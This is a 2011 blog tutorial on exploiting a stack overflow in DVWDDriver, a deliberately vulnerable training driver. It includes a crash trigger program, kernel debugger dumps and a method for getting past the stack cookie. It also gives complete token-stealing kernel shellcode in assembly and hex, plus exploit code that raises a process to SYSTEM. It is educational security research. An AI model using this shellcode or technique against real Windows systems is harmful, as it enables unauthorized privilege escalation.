dimanche 17 juillet 2011

Windows Kernel Exploitation Basics - Part 4 : Stack-based Buffer Overflow exploitation (bypassing cookie)



In this article, we'll exploit the Stack-based Buffer Overflow that is present into the DVWDDriver when we pass a too big buffer to the driver with the DEVICEIO_DVWD_STACKOVERFLOW IOCTL. The concept of buffer overflow in kernelland is the same as in userland. Basically, we've got a buffer that sits in kernelland and we are able to overflow it, here because the function RtlCopyMemory() is not well used as we've seen in the first article of that serie.
First of all, we'll see how to detect such a vulnerability in a driver and then we'll go thru the exploitation process, based on the information given in the book "A guide to Kernel Exploitation" and some papers on that topic that have been released.

1. Triggering the vulnerability

In order to trigger the vulnerability, I've made this small piece of code:
/* IOCTL */
#define DEVICEIO_DVWD_STACKOVERFLOW  CTL_CODE(FILE_DEVICE_UNKNOWN, 0x801, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA) 

int main(int argc, char *argv[]) {
 
 char junk[512];
 HANDLE hDevice;
 
 printf("--[ Fuzz IOCTL DEVICEIO_DVWD_STACKOVERFLOW ---------------------------\n");
 
 printf("[~] Building junk data to send to the driver...\n");
 memset(junk, 'A', 511);
 junk[511] = '\0';
 
 printf("[~] Open an handle to the driver DVWD...\n");
 hDevice = CreateFile("\\\\.\\DVWD", 
    GENERIC_READ | GENERIC_WRITE, 
    FILE_SHARE_WRITE | FILE_SHARE_READ | FILE_SHARE_DELETE, 
    NULL, 
    OPEN_EXISTING, 
    0, 
    NULL);
 printf("\tHandle: %p\n",hDevice);
 getch();
 
 printf("[~] Send IOCTL DEVICEIO_DVWD_STACKOVERFLOW with junk data...\n");
 DeviceIoControl(hDevice, DEVICEIO_DVWD_STACKOVERFLOW, &junk, strlen(junk), NULL, 0, NULL, NULL);

 
 CloseHandle(hDevice);
 return 0;
}

The code is straightforward, it just sends a 512-byte buffer of junk data (actually 511 'A' + '\0'). This should be really enough to overflow the buffer used by the driver, which is only 64-byte length =)
Okay, so let's compile and run the previous code, here's what we get:


BOUM ! A nice Blue Screen Of Death !

Now, we'll attach the Windows VM used for the tests to a remote kernel debugger, that is actually running in another Windows VM. All the details about how to set up remote debugging using VMWare are given in the article [1].

We run the code again, and the Windows VM freezes after sending the buffer to the driver:



... Meanwhile, the remote kernel debugger detects the "fatal system error":

*** Fatal System Error: 0x000000f7
                       (0xB497BD51,0xF786C6EA,0x08793915,0x00000000)

Break instruction exception - code 80000003 (first chance)

A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.

A fatal system error has occurred.

To have more information (a dump), we type !analyze -v, and we get:

kd> !analyze -v
*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

DRIVER_OVERRAN_STACK_BUFFER (f7)
A driver has overrun a stack-based buffer.  This overrun could potentially
allow a malicious user to gain control of this machine.
DESCRIPTION
A driver overran a stack-based buffer (or local variable) in a way that would
have overwritten the function's return address and jumped back to an arbitrary
address when the function returned.  This is the classic "buffer overrun"
hacking attack and the system has been brought down to prevent a malicious user
from gaining complete control of it.
Do a kb to get a stack backtrace -- the last routine on the stack before the
buffer overrun handlers and bugcheck call is the one that overran its local
variable(s).
Arguments:
Arg1: b497bd51, Actual security check cookie from the stack
Arg2: f786c6ea, Expected security check cookie
Arg3: 08793915, Complement of the expected security check cookie
Arg4: 00000000, zero

Debugging Details:
------------------


DEFAULT_BUCKET_ID:  GS_FALSE_POSITIVE_MISSING_GSFRAME

SECURITY_COOKIE:  Expected f786c6ea found b497bd51

BUGCHECK_STR:  0xF7

PROCESS_NAME:  fuzzIOCTL.EXE

CURRENT_IRQL:  0

LAST_CONTROL_TRANSFER:  from 80825b5b to 8086cf70

STACK_TEXT:
f5d6f770 80825b5b 00000003 b497bd51 00000000 nt!RtlpBreakWithStatusInstruction
f5d6f7bc 80826a4f 00000003 000001ff 0012fcdc nt!KiBugCheckDebugBreak+0x19
f5d6fb54 80826de7 000000f7 b497bd51 f786c6ea nt!KeBugCheck2+0x5d1
f5d6fb74 f7858662 000000f7 b497bd51 f786c6ea nt!KeBugCheckEx+0x1b
WARNING: Stack unwind information not available. Following frames may be wrong.
f5d6fb94 f7858316 f785808c 02503afa 82499078 DVWDDriver!DvwdHandleIoctlStackOverflow+0x5ce
f5d6fc10 41414141 41414141 41414141 41414141 DVWDDriver!DvwdHandleIoctlStackOverflow+0x282
f5d6fc14 41414141 41414141 41414141 41414141 0x41414141
f5d6fc18 41414141 41414141 41414141 41414141 0x41414141
[...]
f5d6fd20 41414141 41414141 41414141 41414141 0x41414141
f5d6fd24 41414141 41414141 41414141 41414141 0x41414141


STACK_COMMAND:  kb

FOLLOWUP_IP:
DVWDDriver!DvwdHandleIoctlStackOverflow+5ce
f7858662 cc              int     3

SYMBOL_STACK_INDEX:  4

SYMBOL_NAME:  DVWDDriver!DvwdHandleIoctlStackOverflow+5ce

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: DVWDDriver

IMAGE_NAME:  DVWDDriver.sys

DEBUG_FLR_IMAGE_TIMESTAMP:  4e08f4d5

FAILURE_BUCKET_ID:  0xF7_MISSING_GSFRAME_DVWDDriver!DvwdHandleIoctlStackOverflow+5ce

BUCKET_ID:  0xF7_MISSING_GSFRAME_DVWDDriver!DvwdHandleIoctlStackOverflow+5ce

So, this is the proof that the kernel stack has been overflowed. We can see all our 'A's (0x41) in the dump of the stack at the time of the crash. But, what is important to notice here is the error message: DRIVER_OVERRAN_STACK_BUFFER (f7) which means that the stack overflow has been directly detected by the kernel. This error confirms that a Stack-Cookie - also called a Stack-Canary - is used in order to avoid stack overflow... well, to try to avoid it =). The principle is the same as in userland with the /GS flag available in the linker of MS Visual Studio. Basically, a security cookie (a pseudo-random 4-byte value) is put on the stack between the saved value of EBP and local variables, so that we have to overflow this value if we want to reach and to overflow the saved EIP value. And of course, in the epilog of the function, the security cookie value is checked against the original value (expected value). If they don't match, the fatal error we're in front of is triggered !

2. Stack-Canary ?

If we disassemble the vulnerable function, here is what we can see:


In the prologue of the function, there is a call to __SEH_prolog4_GS ; this is a function used to:
  • Setup the exception handler block (EXCEPTION_REGISTRATION_RECORD) corresponding to the __try { } __except { } written in the function,
  • Setup the Stack-Canary

Moreover, in the epilog of the function, we can see a call to __SEH_epilog4_GS ; this is a function that retrieves the current value of the Stack-Canary and calls the __security_check_cookie() function. This last function is aimed to compare the current value with the expected value of the Stack-Canary. This expected value (symbol: __security_cookie) is stored in the .data segment. If the values don't match, the OS crashes in the same way as during the previous test.



3. How to bypass the Stack-Canary in KernelLand ?

In order to bypass the Stack-Canary, the goal is to trigger an exception before the check of the cookie, that's to say before the call to the __security_check_cookie() function. In userland, the typical way to do it is by sending a large buffer that will write above the stack limit, till we reach an unmapped page in order to spark a memory fault. However, it doesn't work in kernelland because memory fault exceptions that occur in kernel memory areas are not handled by exception handlers, but only crash the OS (BSOD).

So, the idea is to generate a memory fault exception due to the access of an unmapped page in userland, not in kernelland. To do so, we'll create a mapped memory area (anonymous map) using CreateFileMapping() (see [1]) and MapViewOfFileEx() (see [2]) API calls. Then we fill this area with the address of the shellcode we'll write later on.
It's important to understand that we pass a pointer to a user-space buffer, and its size, to the driver when we send a DEVICEIO_DVWD_STACKOVERFLOW IOCTL. The trick is to adjust the pointer to the buffer in such a way that the end of the buffer will sit in the unmapped page that follows. It's actually sufficient to put only the last 4 bytes of the buffer outside the anonymous map. This is well illustrated in the book of DVWDDriver's authors with this figure:



By doing so, when the driver will read the content of the buffer (for the copy), it will end up trying to read an unmapped memory area in userland. Therefore an exception will be triggered, and it will be possible to bypass the Stack-Canary by using SEH exploitation in kernelland.


4. Shellcoding

I've decided not to use the same shellcode as the one given in the DVWDExploit for my tests. Instead of patching the SID into the Access Token of the exploit process, I would like to use another privilege escalation method: to steal the Access Token of a process that is running with Owner SID == NT AUTHORITY\SYSTEM SID, and overwrite the Access Token of the exploit process by the stolen one.

I haven't reinvented the wheel to write the shellcode, I just referred to the two following great papers: [2] and [3]. The shellcode I've used is directly taken/adapted from those papers. The algorithm is the following:

  1. Find _KTHREAD structure corresponding to the current thread, into _KPRCB
  2. Find _EPROCESS structure corresponding to the current process, into _KTHREAD
  3. Look for _EPROCESS corresponding to the process with PID=4 (UniqueProcessId = 4) ; this is the "System" process that always has SID = NT AUTHORITY\SYSTEM SID.
  4. Retrieve the address of the Token of that process
  5. Look for _EPROCESS corresponding to the process we want to escalate
  6. Replace the Token of that process with the Token of the "System" process
  7. Return to userland using SYSEXIT instruction. Before calling SYSEXIT, we set the registers as it is explained in [2] in order to directly jump to our payload in userland that will run with full privileges.

The first step consists in finding the good offsets in the kernel structures for Windows Server 2003 SP2. To do so, we're going to dig into those structures using kd:

kd> r
eax=00000001 ebx=000063a3 ecx=80896d4c edx=000002f8 esi=00000000 edi=ed8fcfa8
eip=8086cf70 esp=80894560 ebp=80894570 iopl=0         nv up ei pl nz na po nc
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00000202

kd> dg @fs
                                  P Si Gr Pr Lo
Sel    Base     Limit     Type    l ze an es ng Flags
---- -------- -------- ---------- - -- -- -- -- --------
0030 ffdff000 00001fff Data RW    0 Bg Pg P  Nl 00000c92

kd> dt nt!_kpcr ffdff000
   [...]
   +0x120 PrcbData         : _KPRCB
   
kd> dt nt!_kprcb ffdff000+0x120
   +0x000 MinorVersion     : 1
   +0x002 MajorVersion     : 1
   +0x004 CurrentThread    : 0x80896e40 _KTHREAD
   +0x008 NextThread       : (null)
   +0x00c IdleThread       : 0x80896e40 _KTHREAD
   [...]


kd> dt nt!_kthread 0x80896e40
   +0x000 Header           : _DISPATCHER_HEADER
   +0x010 MutantListHead   : _LIST_ENTRY [ 0x80896e50 - 0x80896e50 ]
   +0x018 InitialStack     : 0x808948b0 Void
   +0x01c StackLimit       : 0x808918b0 Void
   +0x020 KernelStack      : 0x808945fc Void
   +0x024 ThreadLock       : 0
   +0x028 ApcState         : _KAPC_STATE
   +0x028 ApcStateFill     : [23]  "hn???"
   +0x03f ApcQueueable     : 0x1 ''
   [...]
   
   
kd> dt nt!_kapc_state 0x80896e40+0x28
   +0x000 ApcListHead      : [2] _LIST_ENTRY [ 0x80896e68 - 0x80896e68 ]
   +0x010 Process          : 0x808970c0 _KPROCESS
   +0x014 KernelApcInProgress : 0 ''
   +0x015 KernelApcPending : 0 ''
   +0x016 UserApcPending   : 0 ''
   
kd> dt nt!_eprocess 0x808970c0
   +0x000 Pcb              : _KPROCESS
   +0x078 ProcessLock      : _EX_PUSH_LOCK
   +0x080 CreateTime       : _LARGE_INTEGER 0x0
   +0x088 ExitTime         : _LARGE_INTEGER 0x0
   +0x090 RundownProtect   : _EX_RUNDOWN_REF
   +0x094 UniqueProcessId  : (null)
   +0x098 ActiveProcessLinks : _LIST_ENTRY [ 0x0 - 0x0 ]
   +0x0a0 QuotaUsage       : [3] 0
   +0x0ac QuotaPeak        : [3] 0
   +0x0b8 CommitCharge     : 0
   +0x0bc PeakVirtualSize  : 0
   +0x0c0 VirtualSize      : 0
   +0x0c4 SessionProcessLinks : _LIST_ENTRY [ 0x0 - 0x0 ]
   +0x0cc DebugPort        : (null)
   +0x0d0 ExceptionPort    : (null)
   +0x0d4 ObjectTable      : 0xe1000c60 _HANDLE_TABLE
   +0x0d8 Token            : _EX_FAST_REF
   +0x0dc WorkingSetPage   : 0x17f40
   [...]
   
kd> dt nt!_list_entry
   +0x000 Flink            : Ptr32 _LIST_ENTRY
   +0x004 Blink            : Ptr32 _LIST_ENTRY

kd> dt nt!_token -r1 @@(0xe1001727 & ~7)
   +0x000 TokenSource      : _TOKEN_SOURCE
      +0x000 SourceName       : [8]  "*SYSTEM*"
      +0x008 SourceIdentifier : _LUID
   +0x010 TokenId          : _LUID
      +0x000 LowPart          : 0x3ea
      +0x004 HighPart         : 0n0
   +0x018 AuthenticationId : _LUID
      +0x000 LowPart          : 0x3e7
      +0x004 HighPart         : 0n0
   +0x020 ParentTokenId    : _LUID
      +0x000 LowPart          : 0
      +0x004 HighPart         : 0n0
   +0x028 ExpirationTime   : _LARGE_INTEGER 0x6207526`b64ceb90
      +0x000 LowPart          : 0xb64ceb90
      +0x004 HighPart         : 0n102790438
      +0x000 u                : __unnamed
      +0x000 QuadPart         : 0n441481572610010000
   [...]

From this, we can deduce the following offsets that will be useful for writing the shellcode for Windows Server 2003 SP2:

  • _KTHREAD: located at fs:[0x124] (where the FS segment descriptor points to _KPCR)
  • _EPROCESS: 0x38 from the beginning of _KTHREAD
  • _EPROCESS.ActiveProcessLinks: it is a double-linked list that links all the _EPROCESS structures (for all the processes). It's located at the offset 0x98 from the beginning of _EPROCESS. It also corresponds to the pointer to the next element (Flink) in this double-linked list.
  • _EPROCESS.UniqueProcessId: It is the PID of the corresponding process. It is located at the offset 0x94 from the beginning of _EPROCESS.
  • _EPROCESS.Token: This is the structure that contains the Access Token. The offset in _EPROCESS is 0xD8. Note that it must be aligned by 8.
.486
.model flat,stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\kernel32.lib
assume fs:nothing

.code

shellcode:

; ----------------------------------------------------------------------
;                  Shellcode for Windows Server 2k3
; ----------------------------------------------------------------------

; Offsets
WIN2K3_KTHREAD_OFFSET   equ 124h    ; nt!_KPCR.PcrbData.CurrentThread
WIN2K3_EPROCESS_OFFSET  equ 038h    ; nt!_KTHREAD.ApcState.Process
WIN2K3_FLINK_OFFSET     equ 098h    ; nt!_EPROCESS.ActiveProcessLinks.Flink
WIN2K3_PID_OFFSET       equ 094h    ; nt!_EPROCESS.UniqueProcessId
WIN2K3_TOKEN_OFFSET     equ 0d8h    ; nt!_EPROCESS.Token
WIN2K3_SYS_PID          equ 04h     ; PID Process SYSTEM


pushad                                ; save registers

mov eax, fs:[WIN2K3_KTHREAD_OFFSET]   ; EAX <- current _KTHREAD
mov eax, [eax+WIN2K3_EPROCESS_OFFSET] ; EAX <- current _KPROCESS == _EPROCESS
push eax


mov ebx, WIN2K3_SYS_PID

SearchProcessPidSystem:

mov eax, [eax+WIN2K3_FLINK_OFFSET]    ; EAX <- _EPROCESS.ActiveProcessLinks.Flink
sub eax, WIN2K3_FLINK_OFFSET          ; EAX <- _EPROCESS of the next process
cmp [eax+WIN2K3_PID_OFFSET], ebx      ; UniqueProcessId == SYSTEM PID ?
jne SearchProcessPidSystem            ; if no, retry with the next process...

mov edi, [eax+WIN2K3_TOKEN_OFFSET]    ; EDI <- Token of process with SYSTEM PID
and edi, 0fffffff8h                   ; Must be aligned by 8

pop eax                               ; EAX <- current _EPROCESS 


mov ebx, 41414141h

SearchProcessPidToEscalate:

mov eax, [eax+WIN2K3_FLINK_OFFSET]    ; EAX <- _EPROCESS.ActiveProcessLinks.Flink
sub eax, WIN2K3_FLINK_OFFSET          ; EAX <- _EPROCESS of the next process
cmp [eax+WIN2K3_PID_OFFSET], ebx      ; UniqueProcessId == PID of the process 
                                      ; to escalate ?
jne SearchProcessPidToEscalate        ; if no, retry with the next process...

SwapTokens:

mov [eax+WIN2K3_TOKEN_OFFSET], edi    ; We replace the token of the process 
                                      ; to escalate by the token of the process
                                      ; with SYSTEM PID

PartyIsOver:

popad                                 ; restore registers
mov edx, 11111111h                    ; EIP value after SYSEXIT
mov ecx, 22222222h                    ; ESP value after SYSEXIT
mov eax, 3Bh                          ; FS value in userland (points to _TEB)
db 8Eh, 0E0h                          ; mov fs, ax
db 0Fh, 35h                           ; SYSEXIT

end shellcode

We assemble this asm code with MASM and we retrieve the corresponding sequence of opcodes (Tools > Load Binary File as Hex)... we get:
00000200 :60 64 A1 24 01 00 00 8B - 40 38 50 BB 04 00 00 00
00000210 :8B 80 98 00 00 00 2D 98 - 00 00 00 39 98 94 00 00
00000220 :00 75 ED 8B B8 D8 00 00 - 00 83 E7 F8 58 BB 41 41
00000230 :41 41 8B 80 98 00 00 00 - 2D 98 00 00 00 39 98 94
00000240 :00 00 00 75 ED 89 B8 D8 - 00 00 00 61 BA 11 11 11
00000250 :11 B9 22 22 22 22 B8 3B - 00 00 00 8E E0 0F 35 00

Of course, before using this shellcode, it's necessary to replace the PID value of the process to escalate, the EIP and ESP values after SYSEXIT. We'll do that in the code before sending the buffer.

5. Methodology of exploitation

The exploitation process is the following:

  1. Create an executable memory area and put the previous shellcode (for swapping tokens) in that area.
  2. Similarly, create an executable memory area and put the shellcode that must be executed after the privilege escalation (the payload)
  3. Update the first shellcode with: PID of the process to escalate, EIP to use after SYSEXIT, ESP to use after SYSEXIT. The method is taken from [4].
  4. Create an anonymous map for our buffer
  5. Fill this map with the address of the first shellcode
  6. Adjust the pointer to the buffer in such a way that the last 4 bytes are in an unmapped memory area
  7. Send the buffer to the driver with the DEVICEIO_DVWD_STACKOVERFLOW IOCTL.

6. Exploit code

Here is the main function of the exploit. It should be quite straightforward after the previous explanations.

VOID TriggerOverflow32(VOID) {

 HANDLE hFile;
 DWORD dwReturn;
 UCHAR* map;
 UCHAR *uBuff = NULL;
 BOOL ret;
 ULONG_PTR pShellcode;

 // Load the Kernel Executive ntoskrnl.exe in userland and get some 
 // symbol's kernel address
 if(LoadAndGetKernelBase() == FALSE)
  return;

 
 // Put the shellcodes in executable memory
 mapShellcodeSwapTokens = (UCHAR *)CreateUspaceExecMapping(1);
 mapShellcodePayload    = (UCHAR *)CreateUspaceExecMapping(1);

 memset(mapShellcodeSwapTokens, '\x00', GlobalInfo.dwAllocationGranularity);
 memset(mapShellcodePayload, '\x00', GlobalInfo.dwAllocationGranularity);

 RtlCopyMemory(mapShellcodeSwapTokens, ShellcodeSwapTokens, sizeof(ShellcodeSwapTokens));
 RtlCopyMemory(mapShellcodePayload, ShellcodePayload, sizeof(ShellcodePayload));


 // Added
 printf("[~] Update Shellcode with PID of the process...\n");
 if(!MajShellcodePid(L"DVWDExploit.exe")) {
  printf("[!] An error occured, exitting...\n");
  return;
 }

 printf("[~] Update Shellcode with EIP to use after SYSEXIT...\n");
 if(!MajShellcodeEip()) {
  printf("[!] An error occured, exitting...\n");
  return;
 }

 printf("[~] Update Shellcode with ESP to use after SYSEXIT...\n");
 if(!MajShellcodeEsp()) {
  printf("[!] An error occured, exitting...\n");
  return;
 }
 
 printf("[~] Retrieve the address of the shellcode and build the buffer...\n");

 // Create an anonymous map
 map = (UCHAR *)CreateUspaceMapping(1);
 // Retrieve the address of the shellcode
 pShellcode = (ULONG_PTR)mapShellcodeSwapTokens;
 
 // We fill the map with the address of our shellcode (the address is repeated)
 FillMap(map, pShellcode, GlobalInfo.dwAllocationGranularity);

 // We adjust the pointer to the buffer (size = BUFF_SIZE) in such a way that the 
 // last 4 bytes are in an unmapped memory area
 uBuff = map + GlobalInfo.dwAllocationGranularity - (BUFF_SIZE-sizeof(ULONG_PTR));

 // Now, we send our buffer to the driver and trigger the overflow
 hFile = CreateFile(_T("\\\\.\\DVWD"), GENERIC_READ | GENERIC_WRITE, FILE_SHARE_WRITE | FILE_SHARE_READ | FILE_SHARE_DELETE, NULL, OPEN_EXISTING, 0, NULL);
 deviceHandle = hFile;

 if(hFile != INVALID_HANDLE_VALUE)
  ret = DeviceIoControl(hFile, DEVICEIO_DVWD_STACKOVERFLOW, uBuff, BUFF_SIZE, NULL, 0, &dwReturn, NULL);

 // If you get here the vulnerability has not been triggered ...
 printf("[!] Stack overflow has not been triggered, maybe the driver has not been loaded ?\n");
 return;
}

6. All your base are belong to us


For testing purpose, I've put a simple windows/exec calc.exe shellcode from Metaploit for the payload. However, we can put what we want...


Our calc.exe is running with NT AUTHORITY\SYSTEM privileges, so it means the privilege escalation has succeeded and then, the payload has been well executed.


References

[1] CreateFileMapping() function
http://msdn.microsoft.com/en-us/library/aa366537(v=vs.85).aspx

[2] MapViewOfFileEx() function 
http://msdn.microsoft.com/en-us/library/aa366763(v=VS.85).aspx

[3] Remote Debugging using VMWare
http://www.catch22.net/tuts/vmware

[4] Local Stack Overflow in Windows Kernel, by Heurs
http://www.ghostsinthestack.org/article-29-local-stack-overflow-in-windows-kernel.html

[5] Exploiting Windows Device Drivers, by Piotr Bania
http://pb.specialised.info/all/articles/ewdd.pdf